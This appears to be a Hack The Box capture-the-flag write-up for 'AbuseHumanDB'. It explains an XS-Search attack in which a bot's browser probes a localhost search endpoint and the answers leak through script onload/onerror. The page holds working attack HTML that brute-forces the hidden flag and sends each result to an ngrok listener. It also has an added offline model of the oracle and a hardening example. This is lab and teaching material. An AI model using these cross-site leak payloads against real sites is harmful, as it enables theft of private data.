# Hack the box - AbuseHumanDB

![](https://hackmd.io/_uploads/Hyn-BK9gT.png)

The seed data shows where the flag lives: it is an ordinary row in `userEntries`, but with `approved` set to `0`.

```mysql=
INSERT INTO userEntries (title, url, approved) VALUES ("Back The Hox :: Cyber Catastrophe Propaganda CTF against Aliens", "https://ctf.backthehox.ew/ctf/82", 1);
INSERT INTO userEntries (title, url, approved) VALUES ("Drunk Alien Song | Patlamaya Devam (official video)", "https://www.youtune.com/watch?v=jPPT7TcFmAk", 1);
INSERT INTO userEntries (title, url, approved) VALUES ("Mars Attacks! Earth is invaded by Martians with unbeatable weapons and a cruel sense of humor.", "https://www.imbd.com/title/tt0116996/", 1);
INSERT INTO userEntries (title, url, approved) VALUES ("Professor Steven Rolling fears aliens could ‘plunder, conquer and colonise’ Earth if we contact them", "https://www.thebun.co.uk/tech/4119382/professor-steven-rolling-fears-aliens-could-plunder-conquer-and-colonise-earth-if-we-contact-them/", 1);
INSERT INTO userEntries (title, url, approved) VALUES ("HTB{f4k3_fl4g_f0r_t3st1ng}", "https://app.backthehox.ew/users/107", 0);
```

We can see that the flag is in the database, but we cannot perform SQL injection because the query is parameterized. The only way to reach the table is the search route:

```javascript=
router.get('/api/entries/search', (req, res) => {
    if(req.query.q) {
        const query = `${req.query.q}%`;
        return db.getEntry(query, isLocalhost(req))
            .then(entries => {
                if(entries.length == 0) return res.status(404).send(response('Your search did not yield any results!'));
                res.json(entries);
            })
            .catch(() => res.send(response('Something went wrong! Please try again!')));
    }
    return res.status(403).json(response('Missing required parameters!'));
});
```

In this route, whatever we supply in the `q` parameter gets a `%` appended and is used as a `LIKE` pattern, so the search is a prefix match: it returns every row whose title starts with the value we sent.
If the database returns nothing, the route answers with a 404 status code; otherwise it returns the matching rows with a 200.

![](https://hackmd.io/_uploads/HJbRUt5x6.png)

![](https://hackmd.io/_uploads/B19ALK9eT.png)

But from the outside we only ever get back approved posts, which are public anyway. The second argument of `getEntry` decides whether unapproved rows are included, so to read the flag the request has to come from localhost:

```javascript=
return db.getEntry(query, isLocalhost(req))
```

We also have a bot: when we supply a URL, it visits it from the challenge server, so its requests to `http://127.0.0.1:1337` pass the `isLocalhost` check. That makes this an `XS-Search` challenge: we host a page that makes the bot's browser request the search endpoint, and we observe from that page whether the response was a hit or a miss. A cross-origin `<script src>` is a convenient probe, because the browser fires `onload` when the response has a 2xx status and `onerror` on a 4xx/5xx, so the 200/404 difference leaks without our page ever being able to read the body.

Now let us test whether we get a connection back at all. I will host a server on my PC.

```html=
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Leakkkkk</title>
</head>
<body>
<script>
    let flag = "HTB";
    let s = document.createElement("script");
    // The bot runs on the challenge host, so this is a localhost request for the server
    s.src = "http://127.0.0.1:1337/api/entries/search?q=" + flag;
    // 2xx -> onload, 4xx -> onerror; report the outcome to our ngrok listener
    s.onload = () => location.href = "http://2b7c-27-69-253-13.ngrok-free.app/?success";
    s.onerror = () => location.href = "http://2b7c-27-69-253-13.ngrok-free.app/?error";
    document.body.appendChild(s);
</script>
</body>
</html>
```

![](https://hackmd.io/_uploads/S1ck9K5la.png)

We see that we get the success message back.
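Before spending bot visits on it, it is worth modelling the oracle offline. The Node script below is an added example and not part of the original writeup or the challenge's code: it rebuilds the route's decision (prefix `LIKE` match, unapproved rows only for localhost, 404 on an empty result) over a constructed table seeded with the fake flag from the SQL dump, and drives the character-by-character recovery from nothing but the status code. It goes slightly beyond the page by implementing `LIKE` wildcard semantics for `_` and `%`, which is what makes the order of the candidate characters matter.

```javascript
// Added offline model of the AbuseHumanDB search oracle and the XS-Search
// recovery loop. Not the challenge's code: the table below is constructed and
// the flag in it is the fake one from the seed data.
const userEntries = [
  { title: "Back The Hox :: Cyber Catastrophe Propaganda CTF against Aliens", approved: 1 },
  { title: "Mars Attacks! Earth is invaded by Martians", approved: 1 },
  { title: "HTB{f4k3_fl4g_f0r_t3st1ng}", approved: 0 },
];

// SQL LIKE semantics for the pattern the route builds (`${q}%`):
// '_' matches exactly one character, '%' any run, everything else is literal.
function likeToRegExp(pattern) {
  let re = "^";
  for (const ch of pattern) {
    if (ch === "%") re += ".*";
    else if (ch === "_") re += ".";
    else re += ch.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  }
  return new RegExp(re + "$");
}

// Models db.getEntry(query, isLocalhost(req)) followed by the route's status
// logic: unapproved rows are visible only to localhost, and an empty result
// becomes a 404. Only the status is returned, because that is all a
// cross-origin <script> load/error event can observe.
function searchStatus(q, fromLocalhost) {
  const re = likeToRegExp(q + "%");
  const hits = userEntries.filter(
    (e) => re.test(e.title) && (fromLocalhost || e.approved === 1)
  );
  return hits.length === 0 ? 404 : 200;
}

// Candidate order matters: '}' first so the end of the flag is detected,
// '_' last because as a LIKE wildcard it matches any real character and
// would shadow it. '%' must never be in the set.
const CHARSET = "}0123456789abcdefghijklmnopqrstuvwxyz!#$@&+()*,-_";

// Recover the flag one character at a time from a 200/404 oracle. Returns
// null if no candidate extends the prefix (wrong charset, or the oracle
// cannot see the row) or if maxLen is reached without a closing '}'.
function recoverFlag(oracle, charset = CHARSET, prefix = "HTB{", maxLen = 64) {
  let flag = prefix;
  while (flag.length < maxLen) {
    const next = [...charset].find((c) => oracle(flag + c) === 200);
    if (next === undefined) return null;
    flag += next;
    if (next === "}") return flag;
  }
  return null;
}

// The bot's browser runs on the challenge host, so its requests count as localhost.
console.log(recoverFlag((q) => searchStatus(q, true)));   // recovers the fake flag
console.log(recoverFlag((q) => searchStatus(q, false)));  // null: row hidden from outsiders
```

Swap the oracle for one that reports the real bot's `onload`/`onerror` outcome and the same loop is the attack; putting `_` at the front of the charset instead makes the recovery walk off the end of the title without ever seeing the real characters.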
So from now on we can brute-force the flag one character at a time: each request carries the known prefix plus one candidate character, and `onload` versus `onerror` tells us whether the longer prefix is still correct.

```html=
<script>
    let flag = "HTB{5";
    let s = document.createElement("script");
    s.src = "http://127.0.0.1:1337/api/entries/search?q=" + flag;
    s.onload = () => location.href = "http://2b7c-27-69-253-13.ngrok-free.app/?flag=" + flag;
    s.onerror = () => location.href = "http://2b7c-27-69-253-13.ngrok-free.app/?error";
    document.body.appendChild(s);
</script>
```

![](https://hackmd.io/_uploads/HyaMsF9gT.png)

Here is the brute-force script. Two details of the charset matter: `}` comes first so the closing brace is found as soon as the flag ends, and `_` comes last because it is a `LIKE` single-character wildcard that would otherwise match whatever the real character is. `%` must not be in the charset at all.

```html=
<script>
    let flag = "HTB{";
    let character = "}0123456789abcdefghijklmnopqrstuvwxyz!#$@&+()*,-_";
    let index = 0;

    function searchFlag() {
        // Stop once the flag is closed, or when no candidate matched at this position
        if (flag.endsWith("}") || index >= character.length) return;
        let c = character[index];
        let s = document.createElement("script");
        // The server appends %, so this asks "does a visible title start with flag + c?"
        s.src = "http://127.0.0.1:1337/api/entries/search?q=" + encodeURIComponent(flag + c);
        s.onload = () => {            // 200: the character is right, keep it and restart the charset
            flag += c;
            index = 0;
            fetch("https://51cc-27-69-253-13.ngrok-free.app/?flag=" + encodeURIComponent(flag));
            searchFlag();
        };
        s.onerror = () => {           // 404: try the next candidate
            index++;
            searchFlag();
        };
        document.body.appendChild(s);
    }
    searchFlag();
</script>
```

![](https://hackmd.io/_uploads/SykgVs9lp.png)

Flag: `HTB{5w33t_ali3ndr3n_0f_min3!}`
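For completeness, here is what closing the leak looks like. The handler below is an added hardening example, not the challenge's code (the page never shows `isLocalhost` or `db.getEntry`, so `isLocalhost` and `demoDb` here are stand-ins, and the request and response are plain objects rather than Express ones). It refuses cross-site subresource requests using Fetch Metadata before touching the database, answers 200 with an empty array on a miss so `onload`/`onerror` can no longer distinguish the two outcomes, escapes `LIKE` wildcards (assuming the prepared statement uses `ESCAPE '\'`), and adds `Cross-Origin-Resource-Policy` and `nosniff` as defence in depth.

```javascript
// Added hardening example for /api/entries/search. Not the challenge's code:
// isLocalhost and demoDb are stand-ins for helpers the writeup does not show,
// and req/response are plain objects instead of Express ones so the logic
// runs without a server.

// Stand-in for the challenge's isLocalhost(req) (assumption: peer address check).
function isLocalhost(req) {
  return req.ip === "127.0.0.1" || req.ip === "::1";
}

// Fetch Metadata resource isolation. A <script src> from an attacker page
// arrives with Sec-Fetch-Site: cross-site (and Sec-Fetch-Dest: script); it is
// rejected before the database is queried, so its status cannot depend on q.
function allowedByFetchMetadata(headers) {
  const site = headers["sec-fetch-site"];
  if (site === undefined) return true;                // legacy client without Fetch Metadata
  return site === "same-origin" || site === "none";   // "none": user-initiated navigation
}

// Escape LIKE wildcards so q is a literal prefix (assumes the statement uses ESCAPE '\').
function escapeLike(s) {
  return s.replace(/[\\%_]/g, "\\$&");
}

function handleSearch(req, db) {
  const headers = {
    "Content-Type": "application/json",
    "X-Content-Type-Options": "nosniff",            // never interpreted as a script
    "Cross-Origin-Resource-Policy": "same-origin",  // cross-origin no-cors loads are blocked
  };
  if (!allowedByFetchMetadata(req.headers || {})) {
    return { status: 403, headers, body: { message: "Cross-site request refused" } };
  }
  const q = req.query && req.query.q;
  if (!q) return { status: 400, headers, body: { message: "Missing required parameters!" } };
  const entries = db(escapeLike(String(q)) + "%", isLocalhost(req));
  // Always 200, hit or miss: the body differs, but only the status is
  // observable to a cross-origin error-event oracle.
  return { status: 200, headers, body: entries };
}

// Constructed stand-in for db.getEntry: literal prefix match after unescaping,
// unapproved rows only for localhost.
const TABLE = [
  { title: "Mars Attacks! Earth is invaded by Martians", approved: 1 },
  { title: "HTB{f4k3_fl4g_f0r_t3st1ng}", approved: 0 },
];
function demoDb(pattern, fromLocalhost) {
  const prefix = pattern.slice(0, -1).replace(/\\(.)/g, "$1"); // drop trailing %, unescape
  return TABLE.filter((e) => e.title.startsWith(prefix) && (fromLocalhost || e.approved === 1));
}

// The bot's probe as it arrives from an attacker page: localhost, but cross-site.
const botProbe = {
  ip: "127.0.0.1",
  headers: { "sec-fetch-site": "cross-site", "sec-fetch-mode": "no-cors", "sec-fetch-dest": "script" },
  query: { q: "HTB{" },
};
console.log(handleSearch(botProbe, demoDb).status); // 403, whatever q is
```

The order of the checks is the point: the Fetch Metadata rejection happens before any query, so the status seen by the bot's `<script>` is constant, and even a client that somehow passes it gets the same 200 for a hit and a miss.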